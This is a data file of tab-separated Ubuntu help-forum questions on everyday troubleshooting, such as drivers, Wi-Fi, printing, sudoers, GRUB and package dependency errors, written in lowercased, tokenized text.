463602	why is nothing working right here ?	i used the crouton method via ray waldo 's website to get the linux os . i have it and at first it looked ok but there are problems already . when i switched back , steam wo n't launch , i have no way of ending the application as there is no 'task manager ' as far as i know like a windows computer to see if restarting it would work [ so where is the task manager ? ] second , the synaptic package manager wont run . no idea what 's up with that . finally why does it keep asking for administrative access passwords ? my little brother is supposed to be using this computer freely without problems so i want it to stop giving the 'no access ' screens whenever i put in a flash drive , and the password requests for about everything else . he is mentally differently abled and wo n't understand how to work around the complicated measures for him [ basically it should be able to know he is the only admin and stop showing those screens . ] as for what the computer has , take a look at this www.walmart.com how to solve this ?
463604	turkey.gov.tr libpkcs11wrapper.so ubuntu generic thing	while trying to access https : //www.turkiye.gov.tr/ using smart identity cards , browser java application whether if you have libpkcs11wrapper.so file on your library . general thing is when you search on web you will find as `` install libpkcs11wrapper.so to /usr/lib/ dir '' but this does not solves the problem . but this does n't fix the problem .
463606	empty disk list installing xubuntu	i 'm trying to install xubuntu on a packard bell kvs60 with already installed win xp but , as in the title , does not appear device to be partitioned . the problem is only with the hd netbook , entering a second usb i can see it . i tried running it in live and everything works , so i tried fdisk to verify the presence of 'hd but it is not just seen . looking for around , a possible solution is to disable dmraid module but it does not seem my case , a other say to repair the partition table , probably corrupt , but windows is working , what do you think ? ? sudo parted -l model : sandisk cruzer blade ( scsi ) disk /dev/sda : 8000mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1024b 8000mb 8000mb primary fat32 boot this is the only detected partition , my installation usb ,
463609	init service script is running twice	i have a init script under /etc/init/ to start up an application server . the problem is that it seems to be running twice . here is the command : exec su - deployer -c 'cd /home/deployer/app/current ; /usr/local/rvm/bin/rvm default do bundle exec puma -e production -d -b unix : ///tmp/app.sock -- pidfile /tmp/puma.pid' doing ps aux | grep puma i have : deployer 20176 0.0 0.2 3504 1328 ? ss 21:34 0:00 su - deployer -c cd /home/deployer/app/current ; /usr/local/rvm/bin/rvm default do bundle exec puma -e production deployer 20185 2.0 0.7 7640 3632 ? s 21:34 0:00 -su -c cd /home/deployer/app/current ; /usr/local/rvm/bin/rvm default do bundle exec puma -e production -d -b unix deployer 20347 85.7 12.0 94748 61460 ? rl 21:34 0:03 puma 2.8.2 ( unix : ///tmp/app.sock ) deployer 26602 0.0 12.2 106088 62224 ? sl 21:20 0:00 puma 2.8.2 ( unix : ///tmp/app.sock ) note that it created two sockets instead of one , and the command is duplicated . i have no other service with the same name i have already erased it and done again if i run this command in the console , everything goes ok and just one socket is createad ( as expected ) using ubuntu 12.10
463612	maas juju bootstrap connection error	i have these config : 1 ) maas on vm 2 ) 3 ready node in vm 3 ) when i try to juju bootstrap -- debug i see this error it tries to connect https : //streams.canonical.com/juju/tools/streams/v1/index.json and it returns : dial tcp 91:189:88.141:443 : connection refused !
463613	user is not in the sudoers file	this is my very first post so please bear ( or bare ? ? ? ) with me please . so the problem i have is that when i use the `` sudo '' command on a terminal i get the error `` myuser is not in the sudoers file '' . it all started when i wanted to give a no password access to my account for the sake of a script i was trying to create . i accidentally erased the sudoers file following the wrong guide so i completely lost my sudo previledges . i went into recovery , mounted rw my disk , recreated the sudoers file , chmod the file 440 , made sure my user is in the adm and sudo groups and rebooted . still nothing . if i open a tty and login as root i have the same error message ! let me give you the contents of my sudoers file . i am now using the visudo to edit it so i do n't think i have any syntax errors : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all myuser all= ( all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # includedir /etc/sudoers.d any fresh ideas that might help out ? thank you for your time . edit : i found a solution here ! simple as `` purge remove '' the sudo package and re-install it . just in case you need the code : pkexec apt-get purge sudo pkexec apt-get install sudo as my sudo is messed up , i had to use pkexec which allows me to run my commands as `` root '' . thank you all for your time .
463616	ubuntu 14.04 - icedtea-6-plugin : i386 : depends : icedtea-netx : i386 ( = 1.5-1ubuntu1 )	first of all , i 'm a noob on ubuntu . i needed to run a java application and installed latest version . after that , tried to run .jar file , it worked , but when i try to run the installed files , they give me an error sayin ' that the application is 32bits and my java ( and ubuntu ) installation is 64bits . after googling a while , found that i needed to install icedtea . tried to do so , but could n't succeed . sudo apt-get clean sudo apt-get autoremove gives me reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : icedtea-6-plugin : i386 : depends : icedtea-netx : i386 ( = 1.5-1ubuntu1 ) but it is not installable e : unmet dependencies . try using -f. then tried sudo apt-get -f autoremove and returns me reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : icedtea-netx : i386 the following new packages will be installed : icedtea-netx : i386 0 upgraded , 1 newly installed , 0 to remove and 55 not upgraded . 1 not fully installed or removed . need to get 19,5 kb of archives . after this operation , 155 kb of additional disk space will be used . do you want to continue ? [ y/n ] y get:1 http : // ec . archive . ubuntu . com/ ubuntu/ trusty/main icedtea-netx i386 1.5-1ubuntu1 [ 19,5 kb ] fetched 19,5 kb in 15s ( 1.231 b/s ) ( reading database ... 187313 files and directories currently installed . ) preparing to unpack ... /icedtea-netx_1.5-1ubuntu1_i386.deb ... unpacking icedtea-netx : i386 ( 1.5-1ubuntu1 ) ... dpkg : error processing archive /var/cache/apt/archives/icedtea-netx_1.5-1ubuntu1_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/bin/policyeditor ' , which is different from other instances of package icedtea-netx : i386 errors were encountered while processing : /var/cache/apt/archives/icedtea-netx_1.5-1ubuntu1_i386.deb w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ trusty/partner amd64 packages ( /var/lib/apt/lists/archive . canonical . com_ubuntu_dists_trusty_partner_binary-amd64_packages ) w : duplicate sources.list entry http : // archive . canonical . com /ubuntu/ trusty/partner i386 packages ( /var/lib/apt/lists/archive . canonical .com_ ubuntu_dists_trusty_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ( added some spaces to links since i could n't post it exactly like i copied it from terminal ) tried sudo apt-get update and still same issue . any ideas on how to remove this package and it 's dependencies via console ? or if it 's not possible , how to remove them mannualy ? thanks in advance ! pablo
463617	usb mouse problem	i have installed last version of kubuntu 14.04 and the mouse doesnt have the the feature of paste text with central button . my mouse is usb targus mouse , model amu80us . please can you help me with that , some configuration on my mouse . thank you
463618	setting up subdomain on ubuntu server	ok so i have been trying to do this on and off for the past month . i have a server at mysite.no-ip.org . everything is working fine and i have a blog and owncloud that i access writing mysite.no-ip.org/blog and mysite.no-ip.org/owncloud . now , i want to create subdomains so that i can write blog.mysite.no-ip.org and owncloud.mysite.no-ip.org . i have looked a lot into it and the simplest tutorial was this one which i followed . http : //www.bcat.eu/blog/local-subdomains-under-ubuntu-linux-and-apache-2-4-tutorial/ except that i am not on my server but ssh into it remotely so if i use localhost i can not see if this works i believe . this is my first obstacle , can i follow this tutorial without being present next to the server ? i also just discovered cname records which ( i am not completely sure ) seem necessary to what i want to do . i use no-ip.org and i have tried to follow something like this but this is not really clear either https : //support.uberflip.com/entries/235780-4-4-5-how-to-setup-a-cname-redirect # noip does anyone have any pointers ? this is quite shady to me and i have no idea if i am far from the solution or really close ( at least if i could try localhost that would be a first step in order to check my apache conf but i ca n't even do it since i ssh ) . anyways , thanks for your help in advance . any help , link is welcomed .
463619	lubuntu tf2 shortcut key disable	i when using the lubuntu 14.04 desktop and playing tf2 . if i press ctrl + spacebar tf2 minimize . the key combo does n't do anything in other programs . i do not have this problem on other desktops like unity , gnome , xfce . and i have tried them all . i have also checked lubuntu-rc.xml and have found nothing in it to indicate that ctrl + spacebar would do anything . i can not find anything to disable it . let alone that it even exists . if anyone could point me in the right direction to disable this . i would be very much welcomed .
463624	ubuntu ca n't get correct ip config from router	at a point , all my network settings went crazy . nameserver point to 192.168.0.1 , and ip address is 192.168.0.xxx . nslookup no response ( ca n't resolve any address ) . ca n't ping any address . while another computer under the same network has ip address 10.1.24.xx . i tried to change /etc/resolv.conf but get no luck . can anyone help me out ? or i need to reinstall ubuntu ? update : i 'm using dhcp through wireless .
463625	ipv6 forwarding kills ipv6 connection ?	hi i 'm trying to spin up vms on public ipv6 address 's . when i enable net.ipv6.conf.all.forwarding = 1 on the host it seems to kill the ipv6 connectivity root @ li166-218 : ~ # ip -6 route show dev eth0 2600:3c01 : :/64 proto kernel metric 256 expires 2591994sec fe80 : :/64 proto kernel metric 256 default via fe80 : :1 proto ra metric 1024 expires 84sec root @ li166-218 : ~ # traceroute -6 google.com traceroute to google.com ( 2607 : f8b0:4010:801 : :1000 ) , 30 hops max , 80 byte packets 1 2600:3c01 : :8678 : acff : fe0d:79c1 ( 2600:3c01 : :8678 : acff : fe0d:79c1 ) 0.860 ms 0.915 ms 1.005 ms 2 10gigabitethernet8-2.core3.fmt2.he.net ( 2001:470:1:3b8 : :1 ) 10.615 ms 10.608 ms 7.144 ms 3 10ge5-4.core1.pao1.he.net ( 2001:470:0:263 : :2 ) 6.539 ms 6.601 ms 6.653 ms 4 google-as15169.10gigabitethernet8-2.core1.pao1.he.net ( 2001:470:0:244 : :2 ) 0.937 ms 0.905 ms 0.882 ms 5 2001:4860 : :1:0:21 ( 2001:4860 : :1:0:21 ) 9.843 ms 9.812 ms 9.740 ms 6 2001:4860:0:1 : :3d5 ( 2001:4860:0:1 : :3d5 ) 1.974 ms 1.712 ms 1.979 ms 7 2607 : f8b0:8000:24 : :2 ( 2607 : f8b0:8000:24 : :2 ) 1.575 ms 2607 : f8b0:8000:24 : :7 ( 2607 : f8b0:8000:24 : :7 ) 1.637 ms 2607 : f8b0:8000:24 : :1 ( 2607 : f8b0:8000:24 : :1 ) 1.684 ms root @ li166-218 : ~ # sysctl net.ipv6.conf.all.forwarding=1 net.ipv6.conf.all.forwarding = 1 root @ li166-218 : ~ # traceroute -6 google.com traceroute to google.com ( 2607 : f8b0:4010:801 : :1000 ) , 30 hops max , 80 byte packets connect : network is unreachable when net.ipv6.conf.all.forwarding = 1 i can ping the host from the guest vm . hoever the host no longer has public ipv6 connectivity .
463626	`` ubuntu '' appears in bios boot menu after install ubuntu 14.04	i 've installed ubuntu 14.04 and ubuntu worked without a problem , today when i turn on my laptop i see an blue window before the ubuntu boot menu : now ubuntu does n't work and i ca n't enter bios , i pressed f2 and f12 on my fujitsu laptop but it does n't work too . my laptop bios crashes after install ubuntu 14.04 and i ca n't install any os ! can anyone help me ? thanks !
463627	problem with compiling by g++ : why 5/18 returns zero ?	i have spot an interesting problem in g++ : when i use sin ( 50*3.14/180 ) i get something about 0.766 , however sin ( 5/18*3.24 ) gives me 0.000 . is n't it exacly the same thing ? did anyone spot it before ? thanks in advance for your answer .
463629	ubuntu 14.04 does not connect to wireless	i have a sony vaio model svf14a15cxb running ubuntu 14.04 ( just upgraded ) . happily , my root is back , but currently , i am only able to connect with ethernet . i was n't been able to connect at the library last night my software and updates gui shows my bcm43142 802.11b/g/n broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) is using an alternative driver . below i will supply some command line information , showing that my os is not detecting wlan0 but only eth0 . how can i install the driver , load it , or do whatever i have to do so that wireless connections appear in the upper right hand corner of my gnome panel so it is possible for me to go to starbucks or the library and connect to wireless netowrks ? currently i can do no such thing .
463632	how to upgrade xcache via ondrej ppa	i use ubuntu 12.04 for my vps . i have xcache installed . xcache version is 1.3 current xcache version is 3.1 xcache 3.1 is not available on ubuntu 12.04 officially i found backport https : //launchpad.net/~ondrej/+archive/php5/+sourcepub/3606697/+listing-archive-extra for version 3.1 how on earth do i upgrade xcache 1.3 to xcache 3.1 ? i would really appreciate solutution
463637	i am having trouble booting into ubuntu 14.04	as of last night i have not been able to boot into my os . whenever i do i get a blank command line similar to if there is no os installed . i believe it is due to where it is mounted , when i originally mounted it i set it at / . but now it is set to mount at : /mnt/99324b15-036c-4d4b-9c05-f5b006f41198 and the devise identifies as : /dev/disk/by-uuid/99324b15-036c-4d4b-9c05-f5b006f41198
463640	ubuntu sensors , how to decrease temperatures ' threshold ?	i am experiencing shutdowns of my pc due to overheat of cpu . running the command `` sensors '' i got the following output adapter : virtual device temp1 : +66.0°c ( crit = +101.0°c ) temp2 : +66.0°c ( crit = +101.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +61.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +61.0°c ( high = +105.0°c , crit = +105.0°c ) as you can see high and crit temperatures have the same threshold ( 105.0°c ) i am wondering if maybe fan do not speed up to cool the cpu since it waits to reach the high threshold that is the same threshold that will shutdown the pc . how could i set the high threshold to the correct temperature of 70°c ?
463641	how do i change the max segment size on ubuntu 12.04 server	i just installed unbuntu 12.04 server and the tcp mss is set too low . how do i change it to 1460 ? i have tried stopping the network and then using : sudo echo `` 1460 '' > /proc/sys/net/ipv4/tcp_app_win the response come back with rnetlink answers : no such file or directory ( even though i am looking at the file ) i also tried : sudo ip ro change default via 98.248.48.146 dev eth0 admvss 1460 mtu 1500 and it also errors out . can you help ? thanks in advance !
463642	unable to start kde	rebooting my laptop after a few days of uptime ( so i do n't know what could have triggered the issue ) i have found that i am unable to login from lightdm . my password is accepted and the fields disappear but i am stuck with the lightdm wallpaper and my ( movable ) cursor . i can however login as guest startx from a tty if i try from kdm , the same thing happens . if i try to launch project-neon , the desktop progressbar appear , but i am thrown back to lightdm wallpaper when it is done loading , also a prompt for keyring password appeared , and after entering it , the desktop briefly flashed in . .xsession says that dbus pre-start process terminated with status 2 . i do n't know if it is relevant . edit : i am able to launch lxde without issues . i have tried plasma-active , i have the same symptoms as with project-neon so clearly this is a kde/plasma issue . but since starting from startx works , the issue seem to lie in lightdm/kdm-kde interactions . is there a way to track how lightdm starts kde ( kwin , plasma ) ? also the issue is not with login , the graphical session appears in who and dm-tool list-seats shows a session0 with my username . edit : i have tried a few more things . i mentionned a password prompt in project-neon . if i let it sit for a moment , the desktop eventually appears and works . i have also tried adding debug outputs to startkde and startactive . those in startactive work but not those instartkde ( when starting from lightdm or kdm , but it works from xinit /usr/bin/startkde ) so it may be that lightdm does n't even start startkde , though it does according to lightdm.log .
463643	vm ca n't ping lan name but sees it via nslookup	i am trying to connect to a network resource from my 10.04.4 vm ( vmware fusion ) but the destination is unreachable by name . what is weird is that the name is visible in dns : > nslookup my.name server : 123.45.67.89 address : 123.45.67.89 # 53 non-authoritative answer : name : my.name address : 10.20.30.40 i can reach it ( via ping ) by the ip address ( 10.20.30.40 ) but not the name and i thought that was weird because the dns clearly resolves the name . what can i do to enable access to this resource via the name ?
463644	scsi disk not showing up	i have a seagate scsi disk that is installed in my kurwel 2500r sampler which i send files to via the computer . i had this system running on my windows machine , but am not able to get it configured properly for ubuntu 12.04 the scsi disk is showing up in the bios , and in the kurzweil , but i ca n't seem to get ubuntu to see it . i have used gparted with no results . the scsi drive is connected via a pci slot in the computer . lspci output for scsi is : 04:00.0 scsi storage controller : tekram technology co. , ltd . trm-s1040 ( rev 01 ) more information : $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 74.5g 0 disk ├─sda1 8:1 0 72.5g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 2g 0 part ( in gparted this partition is unreadable ) └─cryptswap1 ( dm-0 ) 252:0 0 2g 0 crypt sdb 8:16 0 931.5g 0 disk └─sdb1 8:17 0 931.5g 0 part /media/trunk sr0 11:0 1 621.1m 0 rom ( none of these drives seem to be the 4 gig scsi drive which is a seagate ) lsscsi outputs this : [ 0:0:0:0 ] disk ata wdc wd800jd-75ms 10.0 /dev/sda [ 1:0:0:0 ] cd/dvd hl-dt-st dvdram gh22ns50 tn00 /dev/sr0 [ 2:0:0:0 ] disk ata hitachi hdt72101 st6o /dev/sdb [ 4:0:6:0 ] process kurzweil k2500 3.02 - ( the bottom is my kurzweil where the drive is installed , but this is scsi 7 and i need to access the drive inside the kurzweil which is scsi 2 ) i have recently discovered that the pci card i use 04:00.0 scsi storage controller : tekram technology co. , ltd . trm-s1040 ( rev 01 ) would need a driver . after googling , i found this article : http : //ubuntuforums.org/showthread.php ? t=1535201 i installed the package kernel-patch-tekram-dc3x5_1.41-2_all.deb , hoping that this would get ubuntu to recognize my drive . after reboot still the drive is absent . below is a description of the driver . i need to know if this is the right one for the kernel i have ? `` dc3x5 is a scsi host by tekram which is not supported out of the box by the linux kernel . this patch adds support for the card to the linux kernel . the cards supported are dc315 and dc395 , both based on the trm-s1040 chipset . this package supports 2.2.20 & 2.4.18 kernels . older and newer 2.2.x and 2.4.x should work too . it should also work and will attempt to apply to 2.5 and 2.0 kernel versions '' looks like i have 3.11.0-18-generic kernel so this wont work.. : ( ideas ?
463645	xmonad windows flashing on other workspaces	i recently did a fresh install of ubuntu 14.04 . i use xmonad . i am an experiencing an odd behavior where windows will flash through onto other workspaces . i can only remove the appearance of erroneous windows by repositioning the windows on the current workspace . this is especially problematic when i attempt to run fullscreen floating borderless windows , which is how i run dota 2 .
463646	switch keyboard layout while alt key is down	while alt is down i want to rebind some keys , like change j k l ; to be arrow keys . then when i release alt the keyboard should go back to default . i saw stuff about the compose key and alternative characters key but those both seem to be all about these weirdo characters éåüßéǘå and i could n't get that to actually switch my keyboard layout .
463648	switch from ubuntu to kubuntu -- 14.04	what is the command to remove all ubuntu apps from a kubuntu desktop , and vice versa , in ubuntu 14.04 ? i want to keep the new unity locker , but remove everything else : ) thanks !
463650	having trouble with the reinstall of windows	i recently installed ubuntu 14.04 on my laptop . ubuntu was n't working good on my laptop so i decided to re-install windows . i tried 2 methodes : i created a boot-able usb for windows 8 retail . when i tried to install windows it said missing operation system the next thing i did was to re-size my partition to get space for windows , when i tried this g parted said that my minimum size was the same as my maximum size . so eventually i cant install windows . is there a different way ?
463656	plymouth wo n't let me access graphical desktop	i installed a theme for plymouth and issued this command to activate it : sudo plymouth-set-default-theme -r steampunk now i ca n't even access my login manager . i 've tried everything i know of , even chroot from a live usb into my file system . none of it has worked . i really need a solution to this , as i have a lot of configurations and python scripts that i need saved .
463657	stuck in low graphics mode-need to re-enable intel card	after installing nvidia 331 graphics driver for my nvidia 740m my laptop boots to ubuntu in `` low graphics mode '' if someone could walk me through the steps of deactivating the nvidia driver and re-enabling the intel one that would help me out quite a bit .
463659	slow graphics when cpu usage is high in 14.04	i just upgraded to 14.04 and it has an annoying issue to me . whenever it is doing something cpu intensive ( ie . encoding audio or video and the usage is over 80 % ) unity goes veeerrry slowly . windows do n't update smoothly , cursors blink erratically , maximizing and minimizing windows are choppy , etc . i have a quad core i7 processor and amd raedon r9 270 graphics card with the latest linux drivers installed . is unity not using the graphics card , and doing everything in cpu for some reason ? previously unity seemed to handle web browsing , e-mail , etc . fine while under high cpu usage while encoding video in 12.04 and 12.10 , but it seems unusable right now . any thoughts ?
463660	how do i erase a cd/dvd-r	for some reason , the basero gui is n't detecting my cd when i try to use the blanking option there . i tried various terminal commands , none of them worked . if anyone could help me out here , i would really appreciate it . here is there error i get when using these commands : `` umount /dev/cdrom '' and `` cdrecord dev=/dev/cdrom blank=fast '' wodim : can not blank disk , aborting . wodim : some drives do not support all blank types . wodim : try again with wodim blank=all .
463661	encrypted swap partition for 14.04	how can i produce an encrypted swap partition for 14.04 ? all the advices i saw here are for versions < 14.04 and do not work for me . i tried a lot but nothing lasted longer than a reboot . is there someone who actually made it happen for 14.04 ? on installation i decided to encrypt my home and 9 gib partition for swap but this swap was never used by kubuntu . gparted finds now an unknown filesystem also i many times formated it as swap , edited fstab and crypttab and used all the tricks mentioned in different advises here on this board . the often mentioned punygeek letter does not work for me probably because `` /etc/initramfs-tools/conf.d/resume `` does not even exist on my system .
463665	replacing xp with ubuntu	i installed ubuntu 12.04 lts on my single partition with xp inside a folder ( from the installer ) ; machine is an old lenovo desktop . i have now optimized the ubuntu , gotten it fully set up with accounts for everyone in the family , etc . i want to get rid of the xp and shift the partition so that it is fully available to ubuntu ( without having to start from installing unbuntu again ) . is this possible ? and if so , how do i go about it ? can i create a new partition on the drive , move the ubuntu into it , remove the other partition and then expand the partition with ubuntu ? if it is n't possible , how do i take my current ubuntu set-up and turn that into an image to install fresh over the xp system ? hoping someone has some clear answers ! thanks .
463666	i have a new netgear router with a wd 1t external drive that i can not see	i have a new netgear r6200 router . i have an external drive hooked up to it by the usb port . on my windows computer i can see the drive and work with the files . on both of my ubuntu 14.04 computers , i can see the workgroup network but can not access the drive or any other computers ( which are all configured for sharing ) .
463671	how do i enable s3 acpi support ?	my pc bios has support for s1 and s3 acpi . i would like to enable the s3 suspension , however when i do try to suspend , the bios boots the computer but the kernel does n't come up and take over . all i get is a blank screen and a noisy fan . http : //paste.ubuntu.com/7426897/ here is : $ dmesg | grep [ aa ] [ cc ] [ pp ] [ ii ] you 'll notice that it drops in and out of s1 just fine . however this line : [ 0.164601 ] acpi : ( supports s0 s1 s4 s5 ) seems to suggest that s3 is not supported by the system . how do i enable s3 acpi support ?
463674	ubuntu 14.04 can not print through canon mf8200 series printer	i have recently upgraded to 14.04 ( 64bit ) . my printer used to work on my ubuntu 12.04 ( 32bit ) , but now can not print . the printer have all the packages successfully installed , and printer can be succefully setup , but it does not print the test page . there is a pending post without solution in this forum : ubuntu 14.04 can not get printing to either canon lbp3300 or canon mg5460 not sure it is the same question , please help me out . i have installed : ( for 64 bit ) to install the libtiff4 library on 64 bit ubuntu 14.04 and linux mint 17 systems : $ wget ftp.us.debian.org/debian/pool/main/t/tiff3/libtiff4_3.9.7-3_amd64.deb $ sudo dpkg -i libtiff4_3.9.7-3_amd64.deb , as introduced in : http : //ubuntuforums.org/showthread.php ? t=2220935 i have followed the steps to download canon linux 2.8.0 driver and follow the steps : installing the printer driver 0j73-005 the printer driver must be installed in order to print from canon printers using linux . the installed files differ depending on the system environment you are using . the following files are installed in 32-bit systems : '' cndrvcups-common-x.xx-x.i386.rpm '' : common module for cups drivers '' cndrvcups-ufr2-us-x.xx-x.i386.rpm '' : ufr ii printer driver module the following files are installed in 64-bit systems : '' cndrvcups-common-x.xx-x.x86_64.rpm '' : common module for cups drivers '' cndrvcups-ufr2-us-x.xx-x.x86_64.rpm '' : ufr ii printer driver module the following files are installed in 32-bit debian systems : '' cndrvcups-common_x.xx-x_i386.deb '' : common module for cups drivers '' cndrvcups-ufr2-us_x.xx-x_i386.deb '' : ufr ii printer driver module the following files are installed in 64-bit debian systems : '' cndrvcups-common_x.xx-x_amd64.deb '' : common module for cups drivers '' cndrvcups-ufr2-us_x.xx-x_amd64.deb '' : ufr ii printer driver module 1 . start linux , and log in as 'root ' . $ su 2 . install the common module for cups drivers . for rpm packages : enter the following command : rpm -ivh [ file name of common module for cups drivers ] for deb packages : enter the following command : dpkg -i [ file name of common module for cups drivers ] note when you execute the rpm command from a directory , specify the path or use the cd command to change the current directory to the directory containing the printer driver files . for details about the rpm command , enter `` man rpm '' with the terminal software , such as gnome terminal . 3 . install the ufr ii printer driver module . for rpm packages : enter the following command : rpm -ivh [ file name of the ufr ii printer driver module ] for deb packages : enter the following command : dpkg -i [ file name of the ufr ii printer driver module ] 4 . restart cups . for rpm packages : enter the following command : /etc/init.d/cups restart for deb packages : enter the following command : /etc/init.d/cupsys restart note do not register the printer using the `` lpadmin '' command before restarting cups . depending on the operating system you are using , you may need to use the above rpm package command to restart cups , even if the system you are using normally requires deb package commands . the above command may be invalid in some operating systems . if so , use the following command . service cups restart 5 . register the printer ( ppd ) with the print spooler .
463675	display issues during install	i am trying to replace my old install of mint14 with a newer linux distro . i have tried lubuntu 14.04 , xubuntu 14.04 and solydx may-14 . however they all are having display issues , even from the livecd so i can not even try to install them images attached : note : during the livecd boot , the splash screens display fine . the issue begins when the desktop shows . so far i have only managed to have solydx jan-14 work and install , however after upgrading the packages , nothing works and i get errors . images attached : as you can see , i can not even log out ! the reason i have tried these particular distros is because i want to be able to leave it on for a long time without constantly having to wipe and reinstall with each new release . the machine is a toshiba tecra a4 with an 800mhz centrino cpu , nvidia 6600 gpu and 512mb ram .
463676	pressing shift does not get me into any grub menu	i need to get into recovery mode but pressing and holding shift does not work during boot , i also tried tapping shift and f8 but nothing happens , any suggestions ? my system runs ubuntu 14.04 and here is my grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=5 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
463677	wifi not working ubuntu 14.04 lts server	i just installed ubuntu 14.04 lts server on my machine . its network connection will be through wifi . however , my wifi connection is not working . my /etc/network/interfaces file is : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto wlan0 iface wlan0 inet dhcp pre-up /etc/init.d/wpa.sh start post-down /etc/init.d/wpa.sh stop when i run the command `` iwlist wlan0 scan '' it returns : wlan0 interface does n't support scanning : network is down in the syslog i see : may 9 17:59:15 andyhyatt-server kernel : [ 361.085482 ] ieee80211 phy0 : brcmsmac : fail to load firmware brcm/bcm43xx-0.fw this leads me to believe that it is a driver issue . i checked in /lib/firmware/brcm/ for bcm43xx-0.fw , but the only driver in that directory is bcm4329-fullmac-4.bin , which makes sense because i am on a mac mini mid 2010 ( macmini4,1 ) . i have a bcm43224 802.11a/b/g/n for my network adapter . configuring wpa_supplicant is not my problem , i will get to that after i obtain proper drivers . also how do i install it . tl ; dr : i need to get a driver for my bcm43224 802.11a/b/g/n .
463686	the ctrl space does not set mark in emacs	i installed ubuntu 14.04 and use fvwm as the windows manager . the ctrl-space does not set mark in emacs . it seems that ctrl-space does nothing . i use ctrl+alt f2 to go to the console , and emacs works correctly there . if i use the ubuntu default windows manager , emacs also works correctly . does anyone have ideas what could be wrong ? thank you very much .
463687	downloading torrents	i recently moved on from windows 8 to ubuntu 13.10 . i torrented a lot of files but i ca n't seem to get it work . i tried qbittorrent and the files only stayed at 'stalled ' . i tried deluge but the files wo n't get past 'downloading 0.00 % ' and with transmission , it says 'downloading from 0 of 0 peers . i 'd appreciate any help because i eventually want to go independent on ubuntu and i really need to know how to do this . thanks
463690	will `` eliminate ubuntu and re-install it '' eliminate all my personal information ?	i had ubuntu 13 . 10 , but recently i upgraded it to 14 . 04 ( manualy ) , compiz started to giving me a lot of problems , now i want to re-install 14 . 04 , as you know there are many types for installation but i want to know if i choose `` eliminate ubuntu and re-install it '' it will erase all my data , i mean my /home partition or just the / partition ?
463694	deluge headless not working at all	so i 've created a home ubuntu server . installed ubuntu server 14.04 selected install samba , mysql , lamp server , openssh server now i am able to get onto the machine via ssh . *note : have not set a static ip set about installing webmin onto my machine . i followed this guide . http : //www.ehowstuff.com/how-to-install-webmin-on-ubuntu-14-04/ that installed ok and is working fine . now onto install deluge . followed this guide http : //www.havetheknowhow.com/install-the-software/install-deluge-headless.html restarted the server . and nothing . it doesnât work at all . deluge wont open at all . its driving me nuts . i 've followed every single step . there is zero deviation from the above guides . i am a linux noob , is there anything i can give you that would help find a solution to my problem . so i typed deluge . and i get this wall of stuff : https : //docs.google.com/document/d/1q6_aeauvpgatp4ty32fbqyi2og0g7xmbpqs7gnfbwz4/edit ? usp=sharing
463698	luckybackup for kubuntu 14.04 ?	i am new to linux and therefore kubuntu 14.04 . i loaded 14.04 successfully and now want to use it to back up files from a linux based ( dlink ) nas drive . this would be a remote drive to the new kubuntu server . can i download and install luckybackup 0.4.8 to my new server ? where from ?
463700	help with clamav	i 've installed clamtk via sudo apt-get install clamtk then realised it 's outdated and purged clamtk . then compiled clamav from source from the latest release following the instructions here when i go to run sudo freshclam i get renamon @ gibson { ~/desktop/clamav-0.98.3 } : sudo freshclam error : ca n't open/parse the config file /usr/local/etc/freshclam.conf and clamscan -r / gives me renamon @ gibson { ~/desktop/clamav-0.98.3 } : sudo clamscan -r / libclamav error : cl_load ( ) : no such file or directory : /usr/local/share/clamav error : ca n't get file status -- -- -- -- -- - scan summary -- -- -- -- -- - known viruses : 0 engine version : 0.98.3 scanned directories : 0 scanned files : 0 infected files : 0 data scanned : 0.00 mb data read : 0.00 mb ( ratio 0.00:1 ) time : 0.000 sec ( 0 m 0 s ) renamon @ gibson { ~/desktop/clamav-0.98.3 } : any help on the issue ?
463701	ethernet problem in ubuntu 14.04	pardon my total lack of knowledge as i 'm a first time user of ubuntu . i recently installed ubuntu 14.04 in a machine which already runs windows 7 hb . i have an ethernet connection which i use to be online . after booting ubuntu and trying to access the internet , i see the message on the right telling me that lan is connected . but , when i try to access any webpage on firefox , it just does n't load . also , i 've pinged www.google.com , which gives me an error , `` unknown host '' . please help . thanks in anticipation . p.s : i 'm a rookie so please give me steps to check if you 're asking for any thing specific .
